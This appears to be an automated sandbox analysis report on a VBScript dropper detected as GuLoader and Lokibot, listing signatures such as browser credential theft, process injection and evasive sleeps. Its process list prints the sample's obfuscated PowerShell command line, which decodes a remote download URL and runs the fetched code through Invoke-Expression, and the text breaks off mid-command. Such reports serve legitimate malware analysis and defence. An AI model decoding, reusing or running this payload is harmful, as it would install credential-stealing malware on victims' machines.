Edit tour
Windows
Analysis Report
Bnnebgers.vbs
Overview
General Information
Detection
GuLoader, Lokibot
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Lokibot
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 6404 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Bnneb gers.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 6648 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "<#Frijsen borg Amate urism Knal lertfreren Unplaitin g #>;$Unif ormsfrakke ='tingene' ;<#Gaffele ns Slgtsar v kommunev algene Cat alufas kal keringens Skibsreder s Pyrolyse vrk #>;$So undly=$hos t.PrivateD ata;If ($S oundly) {$ Realters++ ;}function Burnets25 4($Sewings ){$Noncata clysmic=$B ronzedren+ $Sewings.L ength-$Rea lters;for( $Hulede=5 ;$Hulede - lt $Noncat aclysmic;$ Hulede+=6) {$Extratro pical+=$Se wings[$Hul ede];}$Ext ratropical ;}function Iba($Char broiled){ . ($B eslaglgnin g) ($Charb roiled);}$ Aarendes=B urnets254 'SelvpMKap nioBeg az OpsaiThymy lT.anslG a nua Prim/K lyng5 Penu .Musta0per in Sch,o(E mbadWGldss iHaulanAns .ndStavnoM a wawTaare soverf Bap tNUbiquT r em Borg 1U ncon0Choko . dlis0Vik tu;Nonvo , spsWNussei aboonDob e6 vine4Un .ro;.erag SkamfxDril l6reuss4Na tur;T.ght Hathr Dous vCroqu:bou c 1Snapd2B yg.e1Lremi .Krens0Tru ck)Unort K armiGOtt,k eDezinco e rgkStuttoE nera/ Fast 2 Tryk0Slu tv1N hed0F ,dig0En er 1Z osp0Mu. kl1Ir tt G uiluFFodgn iRaulirAfo oteOversfT lukosenge xSprin/ Pr ef1 ille2R .fer1 Shar .Disap0 In qu ';$Rosk ilde190=Bu rnets254 ' confeuInte rsChunkE S ecorAab n- Mist aKalv egdahabeCo hobNUnsetT Fremt ';$H yetograph= Burnets254 'AfkrihAd frdtBugmut SnivepFri as,onst:Su bve/Jagtl/ munddUsk, er R iniAm invBorsye onn.Slids gToupeo Hy p oEnsilgC horalfr dl eRecha.Pro loc Bryso FiskmAbild / FootuIno rgcRosel?N o,paeVocab x S ifpglo toHazierD iurnt ider =Ph lodpja thoBasiswR etennSlavi lC,nopoUnd gaaBalerdI gro& orfi Stv,odSnit m= Lich1Sk irpnBaadeq Redecj Sag nXUnan M H id.k Counu Nidsty Sad e0K,onjHNo nsyQAnathz LegitkEuro p_camoui,u ttrG Sepac Berkeo efi rA E nsJAf korbStineD AntisrSkri vbArchlsEs traZkjersj ForreA Skr ivSkrm x K l eABunkrb Find ';$K iasmers=Bu rnets254 ' za fr>Styr t ';$Besla glgning=Bu rnets254 ' BoersI rde lEPraesXOv rv ';$Ski bssidernes ='Snarligt ';$Rettels esblad='\A ssimilerin gens.Lan'; Iba (Burne ts254 ' ea rj$antihg konnlSkole oG umpb Ly cta Owenl Fnbl:Morda CLogiey .o mblMylodiS ugiln Frau dLoadaeLak serpedeseS ort r Bill =Nonsp$ Ak tieNephrn EkskvUa hn :Prluda Fs ,epD,onqp, nobbdP.lsy a yclotSam meaDipso+ arch$Datab R VinteEla tet L,vetG lanse.yper lUnsucsFor treOveresM aelsbDesea lCatalaHer hjdNonin ' );Iba (Bur nets254 ' lapp$Spink gTvi llMed iaoHe.heb. elesaHema lBeful:App eSIn.alc nurrrBrn p asketcwBet jelpremysa k de=Mglin $ FradH U fryR,cureF la rtBursi o llesgarv e,rpseudaU .ennpSuver hBundv.Kuk kesP.melpS kulel Knus iSpanktAna ri( obbl$F agblK Udeb i,ingia F easBrovtmY meree L ve r angrsFri mu) M,cu ' );Iba (Bur nets254 'T erm[ D,ag NSpr,ne Pr obtSil c. nyprS Aq.a eSpi sr Un onvCor ciR